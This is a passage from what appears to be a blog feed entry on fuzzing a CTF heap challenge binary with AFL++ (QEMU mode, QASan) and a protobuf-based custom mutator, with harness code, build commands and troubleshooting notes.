class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span 
class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// AFLPlusPlus interface</span></span><br><span class="line"><span class="keyword">extern</span> <span class="string">&quot;C&quot;</span> 
&#123;</span><br><span class="line">  <span class="type">static</span> std::default_random_engine engine_pro;</span><br><span class="line">  <span class="function"><span class="type">static</span> std::uniform_int_distribution&lt;<span class="type">unsigned</span> <span class="type">int</span>&gt; <span class="title">dis</span><span class="params">(<span class="number">0</span>, UINT32_MAX)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="type">void</span> *<span class="title">afl_custom_init</span><span class="params">(<span class="type">void</span> *afl, <span class="type">unsigned</span> <span class="type">int</span> seed)</span> </span>&#123;</span><br><span class="line">    <span class="meta">#<span class="keyword">pragma</span> unused (afl)</span></span><br><span class="line">    engine_pro.<span class="built_in">seed</span>(seed);</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">nullptr</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  </span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">afl_custom_deinit</span><span class="params">(<span class="type">void</span> *data)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(!data);</span><br><span class="line">  &#125;</span><br><span class="line">  </span><br><span class="line">  <span class="comment">// afl_custom_fuzz</span></span><br><span class="line">  <span class="function"><span class="type">size_t</span> <span class="title">afl_custom_fuzz</span><span class="params">(<span class="type">void</span> *data, <span class="type">unsigned</span> <span class="type">char</span> *buf, <span class="type">size_t</span> buf_size, <span class="type">unsigned</span> <span class="type">char</span> **out_buf, </span></span></span><br><span class="line"><span class="params"><span class="function">    
                     <span class="type">unsigned</span> <span class="type">char</span> *add_buf, <span class="type">size_t</span> add_buf_size, <span class="type">size_t</span> max_size)</span> </span>&#123;</span><br><span class="line">    <span class="meta">#<span class="keyword">pragma</span> unused (data)</span></span><br><span class="line">    <span class="meta">#<span class="keyword">pragma</span> unused (add_buf)</span></span><br><span class="line">    <span class="meta">#<span class="keyword">pragma</span> unused (add_buf_size)</span></span><br><span class="line">    </span><br><span class="line">    <span class="type">static</span> <span class="type">uint8_t</span> *saved_buf = <span class="literal">nullptr</span>;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">assert</span>(buf_size &lt;= max_size);</span><br><span class="line">    </span><br><span class="line">    <span class="type">uint8_t</span> *new_buf = (<span class="type">uint8_t</span> *) <span class="built_in">realloc</span>((<span class="type">void</span> *)saved_buf, max_size);</span><br><span class="line">    <span class="keyword">if</span> (!new_buf) &#123;</span><br><span class="line">      *out_buf = buf;</span><br><span class="line">      <span class="keyword">return</span> buf_size;</span><br><span class="line">    &#125;</span><br><span class="line">    saved_buf = new_buf;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">memcpy</span>(new_buf, buf, buf_size);</span><br><span class="line"></span><br><span class="line">    <span class="type">size_t</span> new_size = <span class="built_in">LLVMFuzzerCustomMutator</span>(</span><br><span class="line">      new_buf,</span><br><span class="line">      buf_size,</span><br><span class="line">      max_size,</span><br><span class="line">      <span class="built_in">dis</span>(engine_pro)</span><br><span class="line">    );</span><br><span class="line">    *out_buf = 
new_buf;</span><br><span class="line">    <span class="keyword">return</span> new_size;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="type">size_t</span> <span class="title">afl_custom_post_process</span><span class="params">(<span class="type">void</span>* data, <span class="type">uint8_t</span> *buf, <span class="type">size_t</span> buf_size, <span class="type">uint8_t</span> **out_buf)</span> </span>&#123;</span><br><span class="line">    <span class="meta">#<span class="keyword">pragma</span> unused (data)</span></span><br><span class="line">    <span class="comment">// new_data is never free&#x27;d by pre_save_handler</span></span><br><span class="line">    <span class="comment">// I prefer a slow but clearer implementation for now</span></span><br><span class="line">    </span><br><span class="line">    <span class="type">static</span> <span class="type">uint8_t</span> *saved_buf = <span class="literal">NULL</span>;</span><br><span class="line"></span><br><span class="line">    menuctf::ChoiceList msg;</span><br><span class="line">    std::stringstream stream;</span><br><span class="line">    <span class="comment">// If the input loads successfully</span></span><br><span class="line">    <span class="keyword">if</span> (protobuf_mutator::libfuzzer::<span class="built_in">LoadProtoInput</span>(<span class="literal">true</span>, buf, buf_size, &amp;msg)) &#123;</span><br><span class="line">      <span class="built_in">ProtoToDataHelper</span>(stream, msg);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="comment">// printf(&quot;[afl_custom_post_process] LoadProtoInput Error\n&quot;);   </span></span><br><span class="line">      <span class="comment">// std::ofstream err_bin(&quot;err.bin&quot;);</span></span><br><span class="line">      <span class="comment">// err_bin.write((char*)buf, 
buf_size);</span></span><br><span class="line"></span><br><span class="line">      <span class="comment">// abort();</span></span><br><span class="line"></span><br><span class="line">      <span class="comment">// If loading fails, return an Exit Choice instead</span></span><br><span class="line">      <span class="comment">/// <span class="doctag">NOTE:</span> a bad mutation plus a bad trim makes post process fail to load the input; the trim logic is the main culprit.</span></span><br><span class="line">      <span class="comment">/// <span class="doctag">TODO:</span> the default trim corrupts test cases, so a custom trim is required; for now an empty trim that does nothing is implemented</span></span><br><span class="line">      <span class="built_in">ProtoToDataHelper</span>(stream, menuctf::<span class="built_in">ExitChoice</span>());</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="type">const</span> std::string str = stream.<span class="built_in">str</span>();</span><br><span class="line"></span><br><span class="line">    <span class="type">uint8_t</span> *new_buf = (<span class="type">uint8_t</span> *) <span class="built_in">realloc</span>((<span class="type">void</span> *)saved_buf, str.<span class="built_in">size</span>());</span><br><span class="line">    <span class="keyword">if</span> (!new_buf) &#123;</span><br><span class="line">      *out_buf = buf;</span><br><span class="line">      <span class="keyword">return</span> buf_size;</span><br><span class="line">    &#125;</span><br><span class="line">    *out_buf = saved_buf = new_buf;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">memcpy</span>((<span class="type">void</span> *)new_buf, str.<span class="built_in">c_str</span>(), str.<span class="built_in">size</span>());</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> str.<span class="built_in">size</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="type">int32_t</span>  <span 
class="title">afl_custom_init_trim</span><span class="params">(<span class="type">void</span> *data, <span class="type">uint8_t</span> *buf, <span class="type">size_t</span> buf_size)</span> </span>&#123;</span><br><span class="line">    <span class="comment">/// <span class="doctag">NOTE:</span> disable trim</span></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  </span><br><span class="line">  <span class="function"><span class="type">size_t</span> <span class="title">afl_custom_trim</span><span class="params">(<span class="type">void</span> *data, <span class="type">uint8_t</span> **out_buf)</span> </span>&#123;</span><br><span class="line">    <span class="comment">/// <span class="doctag">NOTE:</span> unreachable</span></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>Of course, writing the code above takes round after round of testing, so here is the test snippet I used. This test code lives in <code>afl-libprotobuf-mutator/src/dump.cc</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span 
class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span 
class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">inline</span> std::string <span class="title">slurp</span><span class="params">(<span class="type">const</span> std::string&amp; path)</span> </span>&#123;</span><br><span class="line">  std::ostringstream buf; </span><br><span class="line">  <span class="function">std::ifstream <span class="title">input</span> <span class="params">(path.c_str())</span></span>; </span><br><span class="line">  buf &lt;&lt; input.<span class="built_in">rdbuf</span>(); </span><br><span class="line">  <span class="keyword">return</span> buf.<span class="built_in">str</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">extern</span> <span class="string">&quot;C&quot;</span> &#123;</span><br><span class="line">  <span class="function"><span class="type">void</span> *<span class="title">afl_custom_init</span><span class="params">(<span class="type">void</span> *afl, <span class="type">unsigned</span> <span class="type">int</span> seed)</span></span>;</span><br><span class="line">  <span class="function"><span class="type">size_t</span> <span class="title">afl_custom_fuzz</span><span class="params">(<span class="type">void</span> *data, <span class="type">unsigned</span> <span class="type">char</span> *buf, <span class="type">size_t</span> buf_size, <span class="type">unsigned</span> <span class="type">char</span> **out_buf, </span></span></span><br><span class="line"><span class="params"><span class="function">                         <span class="type">unsigned</span> <span class="type">char</span> *add_buf, <span class="type">size_t</span> 
add_buf_size, <span class="type">size_t</span> max_size)</span></span>;</span><br><span class="line">  <span class="function"><span class="type">size_t</span> <span class="title">afl_custom_post_process</span><span class="params">(<span class="type">void</span>* data, <span class="type">uint8_t</span> *buf, <span class="type">size_t</span> buf_size, <span class="type">uint8_t</span> **out_buf)</span></span>;</span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">afl_custom_deinit</span><span class="params">(<span class="type">void</span> *data)</span></span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> *argv[])</span> </span>&#123;</span><br><span class="line">  menuctf::ChoiceList msg;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (argc == <span class="number">2</span>) &#123;</span><br><span class="line">    std::string data = <span class="built_in">slurp</span>(argv[<span class="number">1</span>]);</span><br><span class="line">    <span class="keyword">if</span>(!protobuf_mutator::libfuzzer::<span class="built_in">LoadProtoInput</span>(<span class="literal">true</span>, (<span class="type">const</span> <span class="type">uint8_t</span> *)data.<span class="built_in">c_str</span>(), data.<span class="built_in">size</span>(), &amp;msg)) &#123;</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">&quot;[afl_custom_post_process] LoadProtoInput Error\n&quot;</span>);   </span><br><span class="line">      <span class="built_in">abort</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// Exercise the mutation logic</span></span><br><span 
class="line">    <span class="type">void</span>* init_data = <span class="built_in">afl_custom_init</span>(<span class="literal">nullptr</span>, <span class="built_in">time</span>(<span class="literal">NULL</span>));</span><br><span class="line">    <span class="keyword">for</span>(<span class="type">int</span> i = <span class="number">0</span>; i &lt; <span class="number">30</span>; i++) &#123;</span><br><span class="line">      <span class="type">uint8_t</span> *out_buf = <span class="literal">nullptr</span>;</span><br><span class="line">      <span class="type">size_t</span> new_size = <span class="built_in">afl_custom_fuzz</span>(init_data, (<span class="type">uint8_t</span>*)data.<span class="built_in">c_str</span>(), data.<span class="built_in">size</span>(),</span><br><span class="line">                                                  &amp;out_buf,  <span class="literal">nullptr</span>, <span class="number">0</span>, data.<span class="built_in">size</span>() + <span class="number">100</span>);</span><br><span class="line">      <span class="type">uint8_t</span> *new_str = <span class="literal">nullptr</span>;</span><br><span class="line">      <span class="type">size_t</span> new_str_size = <span class="built_in">afl_custom_post_process</span>(init_data, out_buf, new_size, &amp;new_str);</span><br><span class="line">      <span class="function">std::string <span class="title">new_str_str</span><span class="params">((<span class="type">char</span>*)new_str, new_str_size)</span></span>;</span><br><span class="line">      std::cout &lt;&lt; i &lt;&lt; <span class="string">&quot;: &quot;</span> &lt;&lt; new_str_str &lt;&lt; std::endl;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">afl_custom_deinit</span>(init_data);</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="comment">// alloc 12 
&quot;[menuctf::AllocChoice]&quot;</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">auto</span> choice = <span class="keyword">new</span> menuctf::<span class="built_in">AllocChoice</span>();</span><br><span class="line">      choice-&gt;<span class="built_in">set_size</span>(<span class="number">12</span>);</span><br><span class="line">      choice-&gt;<span class="built_in">set_content</span>(<span class="string">&quot;[menuctf::AllocChoice]&quot;</span>);</span><br><span class="line"></span><br><span class="line">      msg.<span class="built_in">add_choice</span>()-&gt;<span class="built_in">set_allocated_alloc_choice</span>(choice);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// update 2 20 &quot;[menuctf::UpdateChoice]&quot;</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">auto</span> choice = <span class="keyword">new</span> menuctf::<span class="built_in">UpdateChoice</span>();</span><br><span class="line">      choice-&gt;<span class="built_in">set_idx</span>(<span class="number">2</span>);</span><br><span class="line">      choice-&gt;<span class="built_in">set_size</span>(<span class="number">20</span>);</span><br><span class="line">      choice-&gt;<span class="built_in">set_content</span>(<span class="string">&quot;[menuctf::UpdateChoice]&quot;</span>);</span><br><span class="line"></span><br><span class="line">      msg.<span class="built_in">add_choice</span>()-&gt;<span class="built_in">set_allocated_update_choice</span>(choice);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// DeleteChoice 3</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">auto</span> choice = <span class="keyword">new</span> menuctf::<span 
class="built_in">DeleteChoice</span>();</span><br><span class="line">      choice-&gt;<span class="built_in">set_idx</span>(<span class="number">3</span>);</span><br><span class="line"></span><br><span class="line">      msg.<span class="built_in">add_choice</span>()-&gt;<span class="built_in">set_allocated_delete_choice</span>(choice);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ViewChoice 4</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">auto</span> choice = <span class="keyword">new</span> menuctf::<span class="built_in">ViewChoice</span>();</span><br><span class="line">      choice-&gt;<span class="built_in">set_idx</span>(<span class="number">4</span>);</span><br><span class="line"></span><br><span class="line">      msg.<span class="built_in">add_choice</span>()-&gt;<span class="built_in">set_allocated_view_choice</span>(choice);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ExitChoice</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">auto</span> choice = <span class="keyword">new</span> menuctf::<span class="built_in">ExitChoice</span>();</span><br><span class="line"></span><br><span class="line">      msg.<span class="built_in">add_choice</span>()-&gt;<span class="built_in">set_allocated_exit_choice</span>(choice);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function">std::ofstream <span class="title">output_file</span><span class="params">(<span class="string">&quot;output.bin&quot;</span>, std::ios::binary)</span></span>;</span><br><span class="line">    <span class="comment">// The message must be saved with the Partial variant of Serialize here</span></span><br><span class="line">    msg.<span 
class="built_in">SerializePartialToOstream</span>(&amp;output_file);</span><br><span class="line">    output_file.<span class="built_in">close</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// std::cout &lt;&lt; &quot;msg DebugString: &quot; &lt;&lt; msg.DebugString() &lt;&lt; std::endl;</span></span><br><span class="line">  std::stringstream stream;</span><br><span class="line">  <span class="built_in">ProtoToDataHelper</span>(stream, msg);</span><br><span class="line">  std::cout &lt;&lt; stream.<span class="built_in">str</span>() &lt;&lt; std::endl;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>Next, simply run <code>./build.sh &amp;&amp; make</code> inside the <code>afl-libprotobuf-mutator</code> folder. When it finishes, three files are generated in the current working directory: <code>dumper</code>, <code>libmutator.so</code>, and <code>mutator</code>. The dumper can be used to test the code above, while libmutator.so is the custom mutator library loaded by AFL++.</p></li></ul><h3 id="3-配置-AFL">3. Configuring AFL++</h3><p>Now the pressure is on AFL++ (lol). Let's first see whether it runs right away.</p><p>Run the following commands to build AFL++:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Build AFLplusplus</span></span><br><span class="line"><span class="comment"># 1. 
Install dependencies</span></span><br><span class="line"><span class="built_in">sudo</span> apt-get update</span><br><span class="line"><span class="built_in">sudo</span> apt-get install -y ninja-build build-essential python3-dev automake git flex bison libglib2.0-dev libpixman-1-dev python3-setuptools</span><br><span class="line"><span class="comment"># try to install llvm 11 and install the distro default if that fails</span></span><br><span class="line"><span class="built_in">sudo</span> apt-get install -y lld-11 llvm-11 llvm-11-dev clang-11 || <span class="built_in">sudo</span> apt-get install -y lld llvm llvm-dev clang </span><br><span class="line"><span class="built_in">sudo</span> apt-get install -y gcc-$(gcc --version|<span class="built_in">head</span> -n1|sed <span class="string">&#x27;s/.* //&#x27;</span>|sed <span class="string">&#x27;s/\..*//&#x27;</span>)-plugin-dev libstdc++-$(gcc --version|<span class="built_in">head</span> -n1|sed <span class="string">&#x27;s/.* //&#x27;</span>|sed <span class="string">&#x27;s/\..*//&#x27;</span>)-dev</span><br><span class="line"><span class="comment"># 2. Build</span></span><br><span class="line"><span class="built_in">cd</span> AFLplusplus</span><br><span class="line">make distrib <span class="comment"># this step takes a while</span></span><br><span class="line"><span class="comment"># sudo make install # install AFL++ on this machine</span></span><br><span class="line"><span class="comment"># when it is no longer needed, remove it with sudo make uninstall</span></span><br></pre></td></tr></table></figure><h3 id="4-运行">4. 
Running</h3><p>Run AFL++ with the following commands:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Once AFL++ is built, set up the corpus in workdir</span></span><br><span class="line"><span class="built_in">mkdir</span> workdir</span><br><span class="line">[set up the corpus, etc. ...]</span><br><span class="line"></span><br><span class="line"><span class="comment"># Set the relevant environment variables</span></span><br><span class="line"><span class="built_in">export</span> AFL_CUSTOM_MUTATOR_ONLY=1 <span class="comment"># disable every built-in mutator, leaving only the custom one</span></span><br><span class="line"><span class="built_in">export</span> AFL_CUSTOM_MUTATOR_LIBRARY=../afl-libprotobuf-mutator/libmutator.so <span class="comment"># path to the custom mutator library</span></span><br><span class="line"><span class="built_in">export</span> AFL_USE_QASAN=1  <span class="comment"># enable QASAN</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Run AFL++</span></span><br><span class="line">AFLplusplus/afl-fuzz -i workdir/fuzz_input -o workdir/fuzz_output -Q -- ./babyheap</span><br></pre></td></tr></table></figure><p>Don't forget to put some input corpus in workdir; a few seeds can be generated with <code>afl-libprotobuf-mutator/dumper</code>.</p><p>If AFL++ reports at run time that <code>afl-qemu-trace</code> does not exist, build it separately by running <code>AFLplusplus/qemu_mode/build_qemu_support.sh</code>.</p><h2 id="三、源代码">III. Source Code</h2><p>The source code and build instructions are published on <a href="https://github.com/Kiprey/protobuf_ctf_fuzz">GitHub</a>.</p><h2 id="四、可改进的地方">IV. Possible Improvements</h2><ol><li>The mutations produced by libprotobuf-mutator are mediocre; it is best to improve them by hand</li><li>A real trim needs to be implemented; the empty trim may lead to a <strong>test-case explosion</strong></li></ol><h2 id="五、一些需要注意的点">V. Things to Watch Out For</h2><p>If, after starting AFL++, the fuzzer never discovers a new path (the path count stays at one), you must check <strong>whether the target CTF binary can actually be executed</strong>. Taking the current babyheap2021 as the example, this is what AFL++ initially looked like in my test:</p><p><img src="/2021/09/protobuf_ctf_fuzz/image-20210927082401830.png" alt="image-20210927082401830"></p><p>Running babyheap directly fails with <code>Permission Denied</code>. Even after granting it executable permission it still does not run, and reports <code>no such file or directory</code>:</p><p><img src="/2021/09/protobuf_ctf_fuzz/image-20210927082630107.png" alt="image-20210927082630107"></p><p>That points to either an architecture mismatch or a problem with libc.so / ld.so. Run the following commands to update the libc.so and ld.so that babyheap uses; after that it executes normally.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">patchelf --set-interpreter /lib64/ld-linux-x86-64.so.2 ./babyheap</span><br><span class="line">patchelf --replace-needed libc.so libc.so.6 ./babyheap</span><br></pre></td></tr></table></figure><p>Once it is running, the results look... okay? (not-sure-I-get-it.jpg)</p><p><img src="/2021/09/protobuf_ctf_fuzz/image-20210927112534183.png" alt="image-20210927112534183"></p><h2 id="六、补充说明">VI. Additional Notes</h2><blockquote><p>Added on the evening of 2022/8/25.</p></blockquote><p>It turns out quite a few people have read this post and even tried it hands-on (I'm shocked). I originally meant it as a toy to play with and did not expect so many people to need something like this. Since it has readers, I should add a few notes.</p><ul><li><p>First, and most important: choosing this babyheap as the example was a <strong>very bad</strong> idea. babyheap has pitfalls of its own, such as the fix-up commands described above. In addition, its internal fixed-address mmap allocation cannot be satisfied under qemu and its prctl call fails as well, so the program exits immediately; it needs some patching. See the comment section for details.</p></li><li><p>Second, test cases fed to AFL must be in protobuf binary format. That is, plaintext input has to be converted to protobuf binary data with <code>afl-libprotobuf-mutator/dumper</code> beforehand and only then fed to AFL; feeding the user's plaintext data to AFL directly causes errors.</p></li><li><p>Third, AFLplusplus is updated far more often than I expected. The version I used dates from <strong>October 2021</strong>; after all this time many interfaces and much of the code have changed, so keep that in mind!</p></li><li><p>Fourth, several people have reported that the mutation quality is just a tiny bit underwhelming. The reason is that the libprotobuf-mutator source ships two kinds of mutation: its own mutation logic, and one that uses libFuzzer's mutation logic. The catch is that the libFuzzer mutation logic is implemented as an empty stub, and the mutation function just returns 0…</p><figure class="highlight cpp"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// https://github.com/google/libprotobuf-mutator/blob/e5869dd9690c3f4dfb842fb90bd07a5a9ee32172/src/libfuzzer/libfuzzer_mutator.cc#L55</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">LIB_PROTO_MUTATOR_WEAK_DEF</span>(<span class="type">size_t</span>, LLVMFuzzerMutate, <span class="type">uint8_t</span>*, <span class="type">size_t</span>, <span class="type">size_t</span>) &#123;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>But the protobuf fuzzer uses exactly that libFuzzer mutation logic, so the code has to be changed. Before each mutation the fuzzer first fetches a mutator, and that mutator performs poorly, so this line needs to be modified:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// https://github.com/google/libprotobuf-mutator/blob/e5869dd9690c3f4dfb842fb90bd07a5a9ee32172/src/libfuzzer/libfuzzer_macro.cc#L126</span></span><br><span class="line"></span><br><span class="line"><span class="function">Mutator* <span class="title">GetMutator</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="type">static</span> Mutator mutator;  <span class="comment">// &lt;---</span></span><br><span class="line">  <span class="keyword">return</span> &amp;mutator;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The code currently uses the derived-class Mutator, which has to be swapped for the <a href="https://github.com/google/libprotobuf-mutator/blob/e5869dd9690c3f4dfb842fb90bd07a5a9ee32172/src/mutator.h#L45">base-class Mutator</a>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Randomly makes incremental change in the given protobuf.</span></span><br><span class="line"><span class="comment">// Usage example:</span></span><br><span class="line"><span class="comment">//    protobuf_mutator::Mutator mutator(1);</span></span><br><span class="line"><span class="comment">//    MyMessage message;</span></span><br><span class="line"><span class="comment">//    message.ParseFromString(encoded_message);</span></span><br><span class="line"><span class="comment">//    mutator.Mutate(&amp;message, 10000);</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Class implements very basic mutations of fields. E.g. it just flips bits for</span></span><br><span class="line"><span class="comment">// integers, floats and strings. Also it increases, decreases size of</span></span><br><span class="line"><span class="comment">// strings only by one. For better results users should override</span></span><br><span class="line"><span class="comment">// protobuf_mutator::Mutator::Mutate* methods with more useful logic, e.g. 
using</span></span><br><span class="line"><span class="comment">// library like libFuzzer.</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Mutator</span> &#123;</span><br><span class="line"> <span class="keyword">public</span>:</span><br><span class="line">    ...</span><br></pre></td></tr></table></figure><p>I had always assumed that the base-class mutator was the canonical protobuf mutator, so I am not sure what the derived one is meant for…</p></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;While reading about &lt;a href=&quot;https://github.com/google/fuzzing/blob/master/docs/structure-aware-fuzzing.md&quot;&gt;structure-aware fuzzing&lt;/a&gt; I came across protobuf, found it interesting, and tried using it to set up quick and simple fuzzing for CTF challenges.&lt;/p&gt;
&lt;p&gt;The automation steps are outlined below, using &lt;a href=&quot;https://ctftime.org/task/16415&quot;&gt;TCTF2021-babyheap2021&lt;/a&gt; as the example.&lt;/p&gt;
&lt;p&gt;The following projects are mainly used:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/AFLplusplus/AFLplusplus&quot;&gt;AFL++&lt;/a&gt;, specifically its QEMU mode together with QASan&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/thebabush/afl-libprotobuf-mutator&quot;&gt;afl-libprotobuf-mutator&lt;/a&gt;&lt;/li&gt;
